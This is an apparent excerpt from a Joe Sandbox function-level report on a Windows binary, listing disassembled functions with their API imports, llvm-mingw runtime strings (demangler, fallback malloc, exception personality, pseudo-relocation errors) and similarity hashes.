Instruction Fuzzy Hash: DD41B82363AB8742E7985F24D85037AA7B5EB48FC1F884139CA9D46691DF3CF5A1C360

Function 00007FF77970B110 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 183COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970B24B
realloc.MSVCRT ref: 00007FF77970B2C5

Strings

starts_with(SV, "basic_"), xrefs: 00007FF77970B416
allocator, xrefs: 00007FF77970B302, 00007FF77970B347
basic_string, xrefs: 00007FF77970B2FB, 00007FF77970B340
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF77970B41D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$allocator$basic_string$starts_with(SV, "basic_")
API String ID: 948496778-4167058683
Opcode ID: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction ID: 1bb4a9a31a40a3797cdcf0ccf50854fce12b53a17071fc8f51d6281d50570723
Opcode Fuzzy Hash: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction Fuzzy Hash: 1D61D363B26A8782EE54DF15E8843A9A771EB48BC4F848631DB9D07790DF3CE552C350

Function 00007FF77970B520 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970B55B
realloc.MSVCRT ref: 00007FF77970B5D1
memcpy.MSVCRT ref: 00007FF77970B5EF
realloc.MSVCRT ref: 00007FF77970B62E
realloc.MSVCRT ref: 00007FF77970B694
realloc.MSVCRT ref: 00007FF77970B6F3

Strings

or<char>, xrefs: 00007FF77970B6B0

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID: or<char>
API String ID: 1833655766-3520798227
Opcode ID: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction ID: f48a14d971199935288cbe261289b525fd195fb4f7b2db7db01420e4ea1ed9af
Opcode Fuzzy Hash: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction Fuzzy Hash: F05171B3A26B4283DE259F59E940269B3B1EB98BC4F408432CB8E07751EF3CE1908350

Function 00007FF7796F7F50 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF7796F804A
_assert.MSVCRT ref: 00007FF7796F809B
calloc.MSVCRT ref: 00007FF7796F80DD
memset.MSVCRT ref: 00007FF7796F8106

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp, xrefs: 00007FF7796F803D, 00007FF7796F808E
reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0, xrefs: 00007FF7796F8087
reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0, xrefs: 00007FF7796F8036

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assert$callocmemset
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp$reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0$reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0
API String ID: 1513271871-212362933
Opcode ID: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
Instruction ID: 9a3238ad46bab396db6a06db77f1e4799cc40a4d68c148586e7f7c930411292d
Opcode Fuzzy Hash: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
Instruction Fuzzy Hash: C3418E13B3B523C1EA15BF15A8117BAE273AF84BC0FC15671D80E93795EE2CA555C360

Function 00007FF7796F2730 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,?,?,00007FF77971FEF8,00007FF77971FEF8,?,?,00007FF7796F0000,?,00007FF7796F2521), ref: 00007FF7796F27F3
VirtualProtect.KERNEL32(?,?,?,?,00007FF77971FEF8,00007FF77971FEF8,?,?,00007FF7796F0000,?,00007FF7796F2521), ref: 00007FF7796F2857
memcpy.MSVCRT ref: 00007FF7796F2870
GetLastError.KERNEL32(?,?,?,?,00007FF77971FEF8,00007FF77971FEF8,?,?,00007FF7796F0000,?,00007FF7796F2521), ref: 00007FF7796F28B3

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF7796F28A7
Address %p has no image-section, xrefs: 00007FF7796F2884
VirtualProtect failed with code 0x%x, xrefs: 00007FF7796F28B9

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
Instruction ID: db8c7f006183802c664732aacea21d53ed7c2bbc608fe0df9185869ad06db02d
Opcode Fuzzy Hash: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
Instruction Fuzzy Hash: 6D417463A3A64381EA10AF16D4846BAA773FB45BC0F944636CD1D83791EE3CE945C760

Function 00007FF77970B372 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970B3E6
memcpy.MSVCRT ref: 00007FF77970B400
_assert.MSVCRT ref: 00007FF77970B42A

Strings

starts_with(SV, "basic_"), xrefs: 00007FF77970B416
basic_ostream, xrefs: 00007FF77970B377
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF77970B41D
basi, xrefs: 00007FF77970B39A

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_ostream$starts_with(SV, "basic_")
API String ID: 2326172077-1855325571
Opcode ID: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
Instruction ID: f0286f3a10aa4e7239bc0c9840e16d2894982b661505003ec234763e527ed1b1
Opcode Fuzzy Hash: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
Instruction Fuzzy Hash: A21163A3B36603C3EE64AF19F980369A371EB58BC1F848435CA4D07754EF2CE6518750

Function 00007FF7796F1880 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 33COMMON

Download Yara Rule

APIs

abort.MSVCRT(00000000,00000000,00000000,?,00007FF7796F1C09), ref: 00007FF7796F19EF
_assert.MSVCRT ref: 00007FF7796F1A08

Strings

actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND), xrefs: 00007FF7796F2141
actions & _UA_SEARCH_PHASE, xrefs: 00007FF7796F2175
actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND), xrefs: 00007FF7796F215B
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF7796F19FB, 00007FF7796F2148, 00007FF7796F2162, 00007FF7796F217C
(base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF7796F19F4

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertabort
String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND)$actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND)$actions & _UA_SEARCH_PHASE
API String ID: 1072228434-30274522
Opcode ID: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
Instruction ID: 294ddb20d2858bfe6cbe717783dab4bf1879b6c893f5affe7fa8f6b2aa32eae8
Opcode Fuzzy Hash: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
Instruction Fuzzy Hash: 71F0B463F3A40791EA24AF56EC814B55336AB587D5F910A32D91D821D0ED2C9587C360

Function 00007FF779704BE0 Relevance: 12.2, APIs: 8, Instructions: 247COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF779704C16
realloc.MSVCRT ref: 00007FF779704D5F
realloc.MSVCRT ref: 00007FF779704DB9
memcpy.MSVCRT ref: 00007FF779704DD7
realloc.MSVCRT ref: 00007FF779704E3C
realloc.MSVCRT ref: 00007FF779704EB0
memcmp.MSVCRT ref: 00007FF779704EE5
realloc.MSVCRT ref: 00007FF779704F25

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcmpmemcpy
String ID:
API String ID: 2517790541-0
Opcode ID: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
Instruction ID: b4c242d24c1ad2f9103d42098fcf193b36b890a4f2367476137af510f042d20a
Opcode Fuzzy Hash: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
Instruction Fuzzy Hash: 959194B3A26B4282EA659F1AE8403A9B7B1FB58BC4F448531CB9D07791EF3CE5518350

Function 00007FF779705480 Relevance: 12.2, APIs: 8, Instructions: 222COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF7797054BF
realloc.MSVCRT ref: 00007FF77970550E
realloc.MSVCRT ref: 00007FF779705568
realloc.MSVCRT ref: 00007FF7797055C6
realloc.MSVCRT ref: 00007FF779705623
realloc.MSVCRT ref: 00007FF779705670
realloc.MSVCRT ref: 00007FF7797056FC
realloc.MSVCRT ref: 00007FF779705757

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
Instruction ID: c5b89a4d904507631e9191d76539317a45b59f6ce28f51834b9e7b07454650d1
Opcode Fuzzy Hash: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
Instruction Fuzzy Hash: C29130B3A16B4683DA659F5AE4543ADB371EB58BC0F808531CB9E077A0EF3CE4458250

Function 00007FF7796F71C0 Relevance: 10.9, APIs: 7, Instructions: 368COMMON

Download Yara Rule

APIs

fputwc.MSVCRT ref: 00007FF7796F7424
fputwc.MSVCRT ref: 00007FF7796F743B
fputwc.MSVCRT ref: 00007FF7796F74B0

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputwc
String ID:
API String ID: 761389786-0
Opcode ID: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
Instruction ID: dbfe954767156b038f90007c734a9111f4cb72ef2be7dd09ddcaff6f08317b81
Opcode Fuzzy Hash: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
Instruction Fuzzy Hash: 62E14273A3A60387E774AE19E15473BB6F3EB44740F805239EB9AC6791EA2CE441D710

Function 00007FF7796FF9C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7796FFAD8
realloc.MSVCRT ref: 00007FF7796FFB7A
malloc.MSVCRT ref: 00007FF7796FFCAA
malloc.MSVCRT ref: 00007FF7796FFD21
memcpy.MSVCRT ref: 00007FF7796FFD3C

Strings

auto, xrefs: 00007FF7796FFD04

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpyrealloc
String ID: auto
API String ID: 2642181057-1723475450
Opcode ID: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
Instruction ID: 2a32f243d3a1bf7cfe7ca012b1b4654cc5bfc0eb1f9be08d59477487b5d9c60f
Opcode Fuzzy Hash: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
Instruction Fuzzy Hash: DCA1C26362AB8281EA249F24D4453AAB7A7FB04790F844336CB9D473D1EF7CE555C310

Function 00007FF779711280 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF779711451

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
Instruction ID: f960564d58ba4a700bc1c62e6def1aae64ccd6eab5b10cc825720044528ea653
Opcode Fuzzy Hash: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
Instruction Fuzzy Hash: 3C710823F79143C7F775EE16E04077DA6E1AB89B94F845530CE6E5A6C1DA3CE8418350

Function 00007FF77970DEF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970DF1C
realloc.MSVCRT ref: 00007FF77970DFE8
realloc.MSVCRT ref: 00007FF77970E042
realloc.MSVCRT ref: 00007FF77970E0A3

Strings

noexcept, xrefs: 00007FF77970DFFD
imaginary, xrefs: 00007FF77970DF7E

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$malloc
String ID: imaginary$noexcept
API String ID: 454241450-3971218317
Opcode ID: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
Instruction ID: 2cffe18798c62ec00c8156549e43cf3801772ff07e350c5df2937329327706f9
Opcode Fuzzy Hash: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
Instruction Fuzzy Hash: 4551D0B3A26B8682EB289F15E4407ADB3B1EB58BC4F548531DB8D07794EF38D591C350

Function 00007FF7796F16B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF7796F1843
_assert.MSVCRT ref: 00007FF7796F185D
_assert.MSVCRT ref: 00007FF7796F1877

Part of subcall function 00007FF7796F4BC0: fflush.MSVCRT ref: 00007FF7796F4C0E

Part of subcall function 00007FF7796F4CA0: fflush.MSVCRT ref: 00007FF7796F4CE3

Strings

actions & _UA_CLEANUP_PHASE, xrefs: 00007FF7796F182F
results.reason == _URC_HANDLER_FOUND, xrefs: 00007FF7796F1849, 00007FF7796F1863
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF7796F1836, 00007FF7796F1850, 00007FF7796F186A

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assert$fflush
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & _UA_CLEANUP_PHASE$results.reason == _URC_HANDLER_FOUND
API String ID: 289967094-1554099779
Opcode ID: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
Instruction ID: dd06e442ba76343fcf79606d55bff7b9b6199f1c46e9c6a14cee1fe12a408630
Opcode Fuzzy Hash: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
Instruction Fuzzy Hash: 8B41D662B3A58341EA25EF42E2407BAD3B3AB957D0F450231DE1D87B94EE2CE5418360

Function 00007FF77970EB50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970EB8E
realloc.MSVCRT ref: 00007FF77970EBEA
realloc.MSVCRT ref: 00007FF77970EC45
realloc.MSVCRT ref: 00007FF77970ECA6

Strings

tInt, xrefs: 00007FF77970EBFF
unsigned, xrefs: 00007FF77970EBA3

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: tInt$unsigned
API String ID: 471065373-1789806510
Opcode ID: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
Instruction ID: 2c24a98f3a320a7a01f775826be6afec8b617b723cc825a3aedd2f4a2266fbd4
Opcode Fuzzy Hash: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
Instruction Fuzzy Hash: 51414FB3A16B8682DA659F56F4542AAB3A1EB58BC0F40C531CB9E07791EF3CE4418350

